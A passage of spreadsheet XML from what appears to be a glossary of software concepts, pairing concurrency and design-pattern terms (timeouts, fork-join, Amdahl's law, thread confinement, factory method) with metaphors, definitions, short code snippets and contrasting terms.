          <t>Pilot waved off, landing gear retracted in proper order.</t>
        </is>
      </c>
      <c r="J578" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K578" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" t="n">
        <v>0</v>
      </c>
      <c r="B579" t="inlineStr">
        <is>
          <t>577</t>
        </is>
      </c>
      <c r="C579" t="inlineStr">
        <is>
          <t>Timeouts</t>
        </is>
      </c>
      <c r="D579" t="inlineStr">
        <is>
          <t>An egg timer taped to every phone in the office: when it dings, you hang up and act, no matter how sweetly the hold music pleads.</t>
        </is>
      </c>
      <c r="E579" t="inlineStr">
        <is>
          <t>Bound every wait — lock, join, network, future — with a timeout so one slow dependency cannot hang its callers forever.</t>
        </is>
      </c>
      <c r="F579" t="inlineStr">
        <is>
          <t>await asyncio.wait_for(op(), timeout=2.0) / f.result(timeout=5)</t>
        </is>
      </c>
      <c r="G579" t="inlineStr">
        <is>
          <t>Cancellation — a timeout decides WHEN to give up; cancellation is HOW the abandoned task actually gets stopped.</t>
        </is>
      </c>
      <c r="H579" t="inlineStr">
        <is>
          <t>Parking meter that ends the errand for you.</t>
        </is>
      </c>
      <c r="J579" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K579" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" t="n">
        <v>0</v>
      </c>
      <c r="B580" t="inlineStr">
        <is>
          <t>578</t>
        </is>
      </c>
      <c r="C580" t="inlineStr">
        <is>
          <t>Structured concurrency</t>
        </is>
      </c>
      <c r="D580" t="inlineStr">
        <is>
          <t>A kindergarten teacher counting heads at the museum exit: the class (scope) does not leave the building until every single child is accounted for.</t>
        </is>
      </c>
      <c r="E580" t="inlineStr">
        <is>
          <t>Child tasks live inside a lexical scope that cannot exit until all complete or cancel — no orphans, and errors propagate to the parent.</t>
        </is>
      </c>
      <c r="F580" t="inlineStr">
        <is>
          <t>async with asyncio.TaskGroup() as tg: / tg.create_task(a()); tg.create_task(b())</t>
        </is>
      </c>
      <c r="G580" t="inlineStr">
        <is>
          <t>Fire-and-forget spawn — detached tasks leak and swallow errors; structured scopes tie task lifetime to a code block.</t>
        </is>
      </c>
      <c r="H580" t="inlineStr">
        <is>
          <t>Climbing rope team clipped so no one tops out alone.</t>
        </is>
      </c>
      <c r="J580" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K580" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" t="n">
        <v>0</v>
      </c>
      <c r="B581" t="inlineStr">
        <is>
          <t>579</t>
        </is>
      </c>
      <c r="C581" t="inlineStr">
        <is>
          <t>Pool draining</t>
        </is>
      </c>
      <c r="D581" t="inlineStr">
        <is>
          <t>Closing time at a pub: doors locked to newcomers, last orders honored, then the lights flick twice and the bouncer walks the room.</t>
        </is>
      </c>
      <c r="E581" t="inlineStr">
        <is>
          <t>Stop accepting new tasks, let in-flight work drain within a deadline, then cancel stragglers and join workers before exiting.</t>
        </is>
      </c>
      <c r="F581" t="inlineStr">
        <is>
          <t>ex.shutdown(wait=True) / shutdown(); awaitTermination(30s); shutdownNow()</t>
        </is>
      </c>
      <c r="G581" t="inlineStr">
        <is>
          <t>Daemon threads — daemons are simply abandoned at process exit; graceful shutdown drains and joins deliberately. | cf. 997 Graceful shutdown (déjà pris): 579 drains one executor's queue; 997 is the whole process's SIGTERM ritual</t>
        </is>
      </c>
      <c r="H581" t="inlineStr">
        <is>
          <t>Airport final boarding: gate closes, cabin checked, doors armed.</t>
        </is>
      </c>
      <c r="J581" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K581" t="inlineStr">
        <is>
          <t>Executors, pools &amp; structured concurrency</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" t="n">
        <v>0</v>
      </c>
      <c r="B582" t="inlineStr">
        <is>
          <t>580</t>
        </is>
      </c>
      <c r="C582" t="inlineStr">
        <is>
          <t>Data parallelism</t>
        </is>
      </c>
      <c r="D582" t="inlineStr">
        <is>
          <t>A hundred lumberjacks handed one identical axe each and one distinct tree each — the same swing everywhere, whole forest down by lunch.</t>
        </is>
      </c>
      <c r="E582" t="inlineStr">
        <is>
          <t>The same operation applied across partitions of a dataset in parallel — you split the data, not the algorithm.</t>
        </is>
      </c>
      <c r="F582" t="inlineStr">
        <is>
          <t>pool.map(process, images) / each worker: same fn, different chunk</t>
        </is>
      </c>
      <c r="G582" t="inlineStr">
        <is>
          <t>Task parallelism — data parallelism runs one function over many chunks; task parallelism runs different functions at once.</t>
        </is>
      </c>
      <c r="H582" t="inlineStr">
        <is>
          <t>Grading stacks of the same exam split among TAs.</t>
        </is>
      </c>
      <c r="J582" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K582" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" t="n">
        <v>0</v>
      </c>
      <c r="B583" t="inlineStr">
        <is>
          <t>581</t>
        </is>
      </c>
      <c r="C583" t="inlineStr">
        <is>
          <t>Task parallelism</t>
        </is>
      </c>
      <c r="D583" t="inlineStr">
        <is>
          <t>A pit crew swarming one car: one changes tires, one fuels, one wipes the visor — completely different jobs in the same four seconds.</t>
        </is>
      </c>
      <c r="E583" t="inlineStr">
        <is>
          <t>Different independent operations run concurrently — you split the algorithm into distinct tasks, possibly over the same data.</t>
        </is>
      </c>
      <c r="F583" t="inlineStr">
        <is>
          <t>t1 = spawn(parse_logs) / t2 = spawn(resize_images) # unrelated jobs</t>
        </is>
      </c>
      <c r="G583" t="inlineStr">
        <is>
          <t>Data parallelism — same op over chunks versus different ops side by side.</t>
        </is>
      </c>
      <c r="H583" t="inlineStr">
        <is>
          <t>Orchestra sections playing different parts of one score.</t>
        </is>
      </c>
      <c r="J583" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K583" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" t="n">
        <v>0</v>
      </c>
      <c r="B584" t="inlineStr">
        <is>
          <t>582</t>
        </is>
      </c>
      <c r="C584" t="inlineStr">
        <is>
          <t>Embarrassingly parallel</t>
        </is>
      </c>
      <c r="D584" t="inlineStr">
        <is>
          <t>Grading 1000 multiple-choice sheets: hand any stack to any helper; no grader ever needs to whisper to another. Almost embarrassing how easy it is.</t>
        </is>
      </c>
      <c r="E584" t="inlineStr">
        <is>
          <t>Work that splits into fully independent units needing no communication — near-linear speedup essentially for free.</t>
        </is>
      </c>
      <c r="F584" t="inlineStr">
        <is>
          <t>Monte Carlo trials, per-frame rendering / pool.map(simulate, param_grid)</t>
        </is>
      </c>
      <c r="G584" t="inlineStr">
        <is>
          <t>Pipeline parallelism — pipelines require handoffs between stages; embarrassing problems require zero coordination at all.</t>
        </is>
      </c>
      <c r="H584" t="inlineStr">
        <is>
          <t>Stuffing envelopes at separate tables, no talking needed.</t>
        </is>
      </c>
      <c r="J584" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K584" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" t="n">
        <v>0</v>
      </c>
      <c r="B585" t="inlineStr">
        <is>
          <t>583</t>
        </is>
      </c>
      <c r="C585" t="inlineStr">
        <is>
          <t>Fork-join</t>
        </is>
      </c>
      <c r="D585" t="inlineStr">
        <is>
          <t>A river delta run in reverse: the stream forks into rushing fingers across the flats, then every finger braids back into one river at the sea.</t>
        </is>
      </c>
      <c r="E585" t="inlineStr">
        <is>
          <t>Recursively split a task into subtasks (fork), run them in parallel, then wait and merge their results (join) — parallel divide-and-conquer.</t>
        </is>
      </c>
      <c r="F585" t="inlineStr">
        <is>
          <t>if small: return solve() / l = fork(left); r = fork(right) / return join(l) + join(r)</t>
        </is>
      </c>
      <c r="G585" t="inlineStr">
        <is>
          <t>Map-reduce — fork-join recurses inside one shared-memory program; map-reduce is a flat two-phase pattern, often across machines.</t>
        </is>
      </c>
      <c r="H585" t="inlineStr">
        <is>
          <t>Family tree drawn downward then inheritance flowing back up.</t>
        </is>
      </c>
      <c r="J585" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K585" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" t="n">
        <v>0</v>
      </c>
      <c r="B586" t="inlineStr">
        <is>
          <t>584</t>
        </is>
      </c>
      <c r="C586" t="inlineStr">
        <is>
          <t>Map-reduce pattern</t>
        </is>
      </c>
      <c r="D586" t="inlineStr">
        <is>
          <t>A national census: thousands of counters tally their own street (map), mail totals to per-state desks (shuffle), which sum them into one book (reduce).</t>
        </is>
      </c>
      <c r="E586" t="inlineStr">
        <is>
          <t>Map a function over records in parallel, then reduce the intermediate results by key into aggregates — with a shuffle in between.</t>
        </is>
      </c>
      <c r="F586" t="inlineStr">
        <is>
          <t>counts = pool.map(count_words, files) / total = reduce(merge, counts)</t>
        </is>
      </c>
      <c r="G586" t="inlineStr">
        <is>
          <t>Plain map + reduce functions — the parallel pattern adds the shuffle-by-key stage and distribution between the two steps.</t>
        </is>
      </c>
      <c r="H586" t="inlineStr">
        <is>
          <t>Potluck: everyone cooks at home, dishes merge onto one table.</t>
        </is>
      </c>
      <c r="J586" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K586" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" t="n">
        <v>0</v>
      </c>
      <c r="B587" t="inlineStr">
        <is>
          <t>585</t>
        </is>
      </c>
      <c r="C587" t="inlineStr">
        <is>
          <t>Pipeline parallelism</t>
        </is>
      </c>
      <c r="D587" t="inlineStr">
        <is>
          <t>A drive-through car wash: while one car is rinsed, the next is being soaped and a third vacuumed — three cars in the tunnel at once.</t>
        </is>
      </c>
      <c r="E587" t="inlineStr">
        <is>
          <t>Chain processing stages so different items occupy different stages simultaneously; throughput equals the slowest stage's rate.</t>
        </is>
      </c>
      <c r="F587" t="inlineStr">
        <is>
          <t>stage1 -&gt; chan -&gt; stage2 -&gt; chan -&gt; stage3 / throughput = 1 / slowest stage</t>
        </is>
      </c>
      <c r="G587" t="inlineStr">
        <is>
          <t>Data parallelism — pipelines split work by STAGE with items flowing through; data parallelism splits by DATA chunk.</t>
        </is>
      </c>
      <c r="H587" t="inlineStr">
        <is>
          <t>Sink-wash-dry-stack dish brigade in a busy kitchen.</t>
        </is>
      </c>
      <c r="J587" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K587" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" t="n">
        <v>0</v>
      </c>
      <c r="B588" t="inlineStr">
        <is>
          <t>586</t>
        </is>
      </c>
      <c r="C588" t="inlineStr">
        <is>
          <t>SIMD</t>
        </is>
      </c>
      <c r="D588" t="inlineStr">
        <is>
          <t>A rubber stamp with eight letters carved in a row: one single thump prints all eight characters onto the page at once.</t>
        </is>
      </c>
      <c r="E588" t="inlineStr">
        <is>
          <t>Single Instruction, Multiple Data: one CPU instruction operates on a whole vector of values held in a wide register (SSE/AVX/NEON).</t>
        </is>
      </c>
      <c r="F588" t="inlineStr">
        <is>
          <t>AVX2: 8 float32 adds per instruction / np.add(a, b) # vectorized underneath</t>
        </is>
      </c>
      <c r="G588" t="inlineStr">
        <is>
          <t>Multithreading (MIMD) — SIMD is parallelism inside one instruction on one core; threads are separate instruction streams.</t>
        </is>
      </c>
      <c r="H588" t="inlineStr">
        <is>
          <t>Muffin tin baking twelve muffins with one oven action.</t>
        </is>
      </c>
      <c r="J588" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K588" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" t="n">
        <v>0</v>
      </c>
      <c r="B589" t="inlineStr">
        <is>
          <t>587</t>
        </is>
      </c>
      <c r="C589" t="inlineStr">
        <is>
          <t>Amdahl's law</t>
        </is>
      </c>
      <c r="D589" t="inlineStr">
        <is>
          <t>A convoy on an infinite-lane highway funneling through one single-lane toll booth: add all the lanes you like, the booth still meters the trip.</t>
        </is>
      </c>
      <c r="E589" t="inlineStr">
        <is>
          <t>Speedup is capped by the serial fraction s: speedup = 1/(s + (1-s)/N) — with 5% serial code the ceiling is 20x, forever.</t>
        </is>
      </c>
      <c r="F589" t="inlineStr">
        <is>
          <t>s = 0.05, N -&gt; inf: speedup &lt;= 20 / speedup(N) = 1 / (s + (1-s)/N)</t>
        </is>
      </c>
      <c r="G589" t="inlineStr">
        <is>
          <t>Gustafson's law — Amdahl fixes the problem size and is pessimistic; Gustafson grows the problem with N and is optimistic.</t>
        </is>
      </c>
      <c r="H589" t="inlineStr">
        <is>
          <t>Relay team as fast as its one unswappable runner.</t>
        </is>
      </c>
      <c r="J589" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K589" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" t="n">
        <v>0</v>
      </c>
      <c r="B590" t="inlineStr">
        <is>
          <t>588</t>
        </is>
      </c>
      <c r="C590" t="inlineStr">
        <is>
          <t>Gustafson's law</t>
        </is>
      </c>
      <c r="D590" t="inlineStr">
        <is>
          <t>Handed a ten-times bigger oven, the baker doesn't bake one loaf faster — she bakes a whole wedding cake in the same single hour.</t>
        </is>
      </c>
      <c r="E590" t="inlineStr">
        <is>
          <t>With more processors you solve proportionally bigger problems in the same time: scaled speedup = N - s(N-1).</t>
        </is>
      </c>
      <c r="F590" t="inlineStr">
        <is>
          <t>speedup = N - s*(N-1) / weak-scaling benchmarks use this lens</t>
        </is>
      </c>
      <c r="G590" t="inlineStr">
        <is>
          <t>Amdahl's law — Amdahl: fixed workload, hard ceiling; Gustafson: workload grows with N, so scaling keeps paying.</t>
        </is>
      </c>
      <c r="H590" t="inlineStr">
        <is>
          <t>More painters don't finish the fence sooner; they paint the whole barn.</t>
        </is>
      </c>
      <c r="J590" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K590" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" t="n">
        <v>0</v>
      </c>
      <c r="B591" t="inlineStr">
        <is>
          <t>589</t>
        </is>
      </c>
      <c r="C591" t="inlineStr">
        <is>
          <t>Task granularity</t>
        </is>
      </c>
      <c r="D591" t="inlineStr">
        <is>
          <t>Shoveling snow by the teaspoon versus by the single truckload: teaspoons spend all day walking back and forth; one truckload leaves nine shovelers idle.</t>
        </is>
      </c>
      <c r="E591" t="inlineStr">
        <is>
          <t>Chunk-size tuning: tasks too fine drown in scheduling overhead; too coarse leave cores idle — batch until overhead is amortized.</t>
        </is>
      </c>
      <c r="F591" t="inlineStr">
        <is>
          <t>pool.map(f, data, chunksize=1000) / rule: task time &gt;&gt; dispatch overhead</t>
        </is>
      </c>
      <c r="G591" t="inlineStr">
        <is>
          <t>Lock granularity — that is how much data one lock guards; task granularity is how much work one task carries.</t>
        </is>
      </c>
      <c r="H591" t="inlineStr">
        <is>
          <t>Mailing 1000 letters individually vs one pallet vs splitting into crates.</t>
        </is>
      </c>
      <c r="J591" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K591" t="inlineStr">
        <is>
          <t>Parallel patterns</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" t="n">
        <v>0</v>
      </c>
      <c r="B592" t="inlineStr">
        <is>
          <t>590</t>
        </is>
      </c>
      <c r="C592" t="inlineStr">
        <is>
          <t>Minimize shared mutable state</t>
        </is>
      </c>
      <c r="D592" t="inlineStr">
        <is>
          <t>A potluck where every dish arrives in sealed single-serve boxes: nothing communal to sneeze in, nothing left to fight over.</t>
        </is>
      </c>
      <c r="E592" t="inlineStr">
        <is>
          <t>The master rule: races need sharing AND mutation — make data immutable, confined, or message-passed, and locks become rare.</t>
        </is>
      </c>
      <c r="F592" t="inlineStr">
        <is>
          <t>shared -&gt; make it immutable / mutable -&gt; keep it unshared</t>
        </is>
      </c>
      <c r="G592" t="inlineStr">
        <is>
          <t>Lock everything — locks manage the danger; removing shared mutability removes the danger's precondition entirely.</t>
        </is>
      </c>
      <c r="H592" t="inlineStr">
        <is>
          <t>Separate checking accounts instead of one joint account with rules.</t>
        </is>
      </c>
      <c r="J592" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K592" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" t="n">
        <v>0</v>
      </c>
      <c r="B593" t="inlineStr">
        <is>
          <t>591</t>
        </is>
      </c>
      <c r="C593" t="inlineStr">
        <is>
          <t>Immutability as strategy</t>
        </is>
      </c>
      <c r="D593" t="inlineStr">
        <is>
          <t>Sharing a stone statue instead of a wet clay one: a thousand hands may touch it at once and it is still exactly the sculptor's shape.</t>
        </is>
      </c>
      <c r="E593" t="inlineStr">
        <is>
          <t>Objects that never change after construction are safe to share among any number of threads with zero synchronization.</t>
        </is>
      </c>
      <c r="F593" t="inlineStr">
        <is>
          <t>@dataclass(frozen=True) / update = build new object, swap one reference</t>
        </is>
      </c>
      <c r="G593" t="inlineStr">
        <is>
          <t>Thread-local copies — immutable data is shared safely; thread-local data is not shared at all.</t>
        </is>
      </c>
      <c r="H593" t="inlineStr">
        <is>
          <t>Printed book vs a communal editable manuscript.</t>
        </is>
      </c>
      <c r="J593" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K593" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" t="n">
        <v>0</v>
      </c>
      <c r="B594" t="inlineStr">
        <is>
          <t>592</t>
        </is>
      </c>
      <c r="C594" t="inlineStr">
        <is>
          <t>Thread confinement</t>
        </is>
      </c>
      <c r="D594" t="inlineStr">
        <is>
          <t>A diary that never leaves your bunk: nobody bothers locking it because nobody else can ever reach it. The bunk itself is the lock.</t>
        </is>
      </c>
      <c r="E594" t="inlineStr">
        <is>
          <t>Restrict data to exactly one thread — GUI-thread rule, thread-locals, per-worker state — so synchronization is never needed.</t>
        </is>
      </c>
      <c r="F594" t="inlineStr">
        <is>
          <t>tl = threading.local(); tl.conn = connect() / Swing rule: touch UI only on the EDT</t>
        </is>
      </c>
      <c r="G594" t="inlineStr">
        <is>
          <t>Immutability — confined data may mutate freely (only one toucher); immutable data may be shared freely (no mutation).</t>
        </is>
      </c>
      <c r="H594" t="inlineStr">
        <is>
          <t>A chef's personal knife no other cook may borrow.</t>
        </is>
      </c>
      <c r="J594" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K594" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" t="n">
        <v>0</v>
      </c>
      <c r="B595" t="inlineStr">
        <is>
          <t>593</t>
        </is>
      </c>
      <c r="C595" t="inlineStr">
        <is>
          <t>Single-writer principle</t>
        </is>
      </c>
      <c r="D595" t="inlineStr">
        <is>
          <t>One scribe holds the guest book's only quill; anyone may read the pages over his shoulder while he alone writes the entries.</t>
        </is>
      </c>
      <c r="E595" t="inlineStr">
        <is>
          <t>Allow many readers but exactly one designated writer per datum; write contention vanishes and reasoning becomes sequential.</t>
        </is>
      </c>
      <c r="F595" t="inlineStr">
        <is>
          <t>LMAX Disruptor: one producer per sequence / owner goroutine mutates; others send requests</t>
        </is>
      </c>
      <c r="G595" t="inlineStr">
        <is>
          <t>Read-write lock — RW locks let the writer role rotate among threads; single-writer fixes the writer's identity by design.</t>
        </is>
      </c>
      <c r="H595" t="inlineStr">
        <is>
          <t>Scoreboard updated only by the official scorer.</t>
        </is>
      </c>
      <c r="J595" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K595" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" t="n">
        <v>0</v>
      </c>
      <c r="B596" t="inlineStr">
        <is>
          <t>594</t>
        </is>
      </c>
      <c r="C596" t="inlineStr">
        <is>
          <t>Idempotent handlers</t>
        </is>
      </c>
      <c r="D596" t="inlineStr">
        <is>
          <t>An elevator call button: press it once or mash it twelve times in a panic, exactly one elevator comes.</t>
        </is>
      </c>
      <c r="E596" t="inlineStr">
        <is>
          <t>Design message and event handlers so processing the same message twice equals once — retries and redeliveries become harmless.</t>
        </is>
      </c>
      <c r="F596" t="inlineStr">
        <is>
          <t>if seen(msg.id): return / UPDATE orders SET s='paid' WHERE id=? AND s='pending'</t>
        </is>
      </c>
      <c r="G596" t="inlineStr">
        <is>
          <t>Exactly-once delivery — the network cannot promise it; idempotency makes at-least-once delivery behave like exactly-once.</t>
        </is>
      </c>
      <c r="H596" t="inlineStr">
        <is>
          <t>Light switch already on: flipping 'on' again changes nothing.</t>
        </is>
      </c>
      <c r="J596" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K596" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" t="n">
        <v>0</v>
      </c>
      <c r="B597" t="inlineStr">
        <is>
          <t>595</t>
        </is>
      </c>
      <c r="C597" t="inlineStr">
        <is>
          <t>Prefer high-level primitives</t>
        </is>
      </c>
      <c r="D597" t="inlineStr">
        <is>
          <t>Buying a certified factory ladder instead of nailing one together from scrap lumber: the hard safety thinking was done once, by experts, at the factory.</t>
        </is>
      </c>
      <c r="E597" t="inlineStr">
        <is>
          <t>Reach for queues, executors, channels, and concurrent collections before raw threads, locks, and condition variables.</t>
        </is>
      </c>
      <c r="F597" t="inlineStr">
        <is>
          <t>queue.Queue, TaskGroup, ConcurrentHashMap / not: Thread + Lock + CV hand-wired</t>
        </is>
      </c>
      <c r="G597" t="inlineStr">
        <is>
          <t>Abstraction-overhead worry — these primitives are expert-tuned; hand-rolled lock code is usually both slower and subtly wrong.</t>
        </is>
      </c>
      <c r="H597" t="inlineStr">
        <is>
          <t>Taking the elevator instead of free-climbing the shaft.</t>
        </is>
      </c>
      <c r="J597" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K597" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" t="n">
        <v>0</v>
      </c>
      <c r="B598" t="inlineStr">
        <is>
          <t>596</t>
        </is>
      </c>
      <c r="C598" t="inlineStr">
        <is>
          <t>Race detectors</t>
        </is>
      </c>
      <c r="D598" t="inlineStr">
        <is>
          <t>A UV blacklight swept over the crime scene: invisible fingerprint smears on the shared doorknob suddenly glow purple with thread IDs.</t>
        </is>
      </c>
      <c r="E598" t="inlineStr">
        <is>
          <t>Dynamic tools (Go -race, ThreadSanitizer) instrument memory accesses to catch data races in test runs that eyes would never see.</t>
        </is>
      </c>
      <c r="F598" t="inlineStr">
        <is>
          <t>go test -race ./... / clang -fsanitize=thread app.c</t>
        </is>
      </c>
      <c r="G598" t="inlineStr">
        <is>
          <t>Static linters — detectors watch real executions (few false positives, but the race must run); linters only guess from source.</t>
        </is>
      </c>
      <c r="H598" t="inlineStr">
        <is>
          <t>Dye packs revealing which hands touched the cash.</t>
        </is>
      </c>
      <c r="J598" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K598" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" t="n">
        <v>0</v>
      </c>
      <c r="B599" t="inlineStr">
        <is>
          <t>597</t>
        </is>
      </c>
      <c r="C599" t="inlineStr">
        <is>
          <t>Stress testing concurrency</t>
        </is>
      </c>
      <c r="D599" t="inlineStr">
        <is>
          <t>An airline wing-bend rig flexing the spar a million times overnight: the fatigue crack due in year ten shows up by morning.</t>
        </is>
      </c>
      <c r="E599" t="inlineStr">
        <is>
          <t>Hammer suspect code with many threads, iterations, and injected timing jitter so rare interleavings become likely enough to catch.</t>
        </is>
      </c>
      <c r="F599" t="inlineStr">
        <is>
          <t>for _ in range(10_000): run_threads(100) / inject random 0-1ms sleeps to widen races</t>
        </is>
      </c>
      <c r="G599" t="inlineStr">
        <is>
          <t>Unit tests — one green run proves one interleaving worked; stress tests sample thousands of interleavings.</t>
        </is>
      </c>
      <c r="H599" t="inlineStr">
        <is>
          <t>Shaking the vending machine until the stuck snack falls.</t>
        </is>
      </c>
      <c r="J599" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K599" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" t="n">
        <v>0</v>
      </c>
      <c r="B600" t="inlineStr">
        <is>
          <t>598</t>
        </is>
      </c>
      <c r="C600" t="inlineStr">
        <is>
          <t>Keep critical sections tiny</t>
        </is>
      </c>
      <c r="D600" t="inlineStr">
        <is>
          <t>Grab the office's only stapler, CLICK, put it straight back — never wander off to lunch with the shared stapler in your pocket.</t>
        </is>
      </c>
      <c r="E600" t="inlineStr">
        <is>
          <t>Hold locks for the fewest instructions possible; never do I/O, heavy computation, or callbacks into unknown code while holding one.</t>
        </is>
      </c>
      <c r="F600" t="inlineStr">
        <is>
          <t>with lock: item = q.pop() / process(item) # heavy work outside the lock</t>
        </is>
      </c>
      <c r="G600" t="inlineStr">
        <is>
          <t>Lock granularity — granularity is how much DATA a lock covers; this rule is about how much TIME you hold it.</t>
        </is>
      </c>
      <c r="H600" t="inlineStr">
        <is>
          <t>Fridge rule: door open only long enough to grab the milk.</t>
        </is>
      </c>
      <c r="J600" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K600" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" t="n">
        <v>0</v>
      </c>
      <c r="B601" t="inlineStr">
        <is>
          <t>599</t>
        </is>
      </c>
      <c r="C601" t="inlineStr">
        <is>
          <t>Never sync by sleeping</t>
        </is>
      </c>
      <c r="D601" t="inlineStr">
        <is>
          <t>Leaving the package on the porch and napping until the courier has 'probably' come — versus a doorbell that rings at the actual pickup.</t>
        </is>
      </c>
      <c r="E601" t="inlineStr">
        <is>
          <t>sleep(n) is a timing guess, not synchronization; wait on the actual condition with joins, events, barriers, or queues.</t>
        </is>
      </c>
      <c r="F601" t="inlineStr">
        <is>
          <t>bad: time.sleep(2); assert done / good: event.wait(); assert done</t>
        </is>
      </c>
      <c r="G601" t="inlineStr">
        <is>
          <t>Timeouts — a timeout bounds a wait on a real condition; a bare sleep waits blind and races against reality.</t>
        </is>
      </c>
      <c r="H601" t="inlineStr">
        <is>
          <t>Guessing the bus schedule instead of watching the arrivals board.</t>
        </is>
      </c>
      <c r="J601" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K601" t="inlineStr">
        <is>
          <t>Concurrency discipline</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" t="n">
        <v>0</v>
      </c>
      <c r="B602" t="inlineStr">
        <is>
          <t>600</t>
        </is>
      </c>
      <c r="C602" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
      <c r="D602" t="inlineStr">
        <is>
          <t>A maternity ward where masked midwives hand you swaddled babies through a wall hatch — you never glimpse the delivery room. Creation happens behind the hatch.</t>
        </is>
      </c>
      <c r="E602" t="inlineStr">
        <is>
          <t>GoF pattern family that abstracts how objects get created, decoupling client code from concrete constructors and construction logic.</t>
        </is>
      </c>
      <c r="F602" t="inlineStr">
        <is>
          <t>WidgetFactory.create() instead of new ConcreteWidget() sprinkled through client code</t>
        </is>
      </c>
      <c r="G602" t="inlineStr">
        <is>
          <t>Structural patterns — creational govern how objects are born; structural govern how existing objects are composed.</t>
        </is>
      </c>
      <c r="H602" t="inlineStr">
        <is>
          <t>A 3D printer farm — rejected as too generic to stick.</t>
        </is>
      </c>
      <c r="J602" t="inlineStr">
        <is>
          <t>Architecture &amp; design patterns</t>
        </is>
      </c>
      <c r="K602" t="inlineStr">
        <is>
          <t>Creational patterns</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" t="n">
        <v>0</v>
      </c>
      <c r="B603" t="inlineStr">
        <is>
          <t>601</t>
        </is>
      </c>
      <c r="C603" t="inlineStr">
        <is>
          <t>Factory method</t>
        </is>
      </c>
      <c r="D603" t="inlineStr">
        <is>
          <t>Pizza chain HQ mandates one ritual, makePizza() — but each franchise kitchen bakes its own pie: Chicago deep dish here, Napoli thin crust there.</t>
        </is>
      </c>
      <c r="E603" t="inlineStr">
        <is>
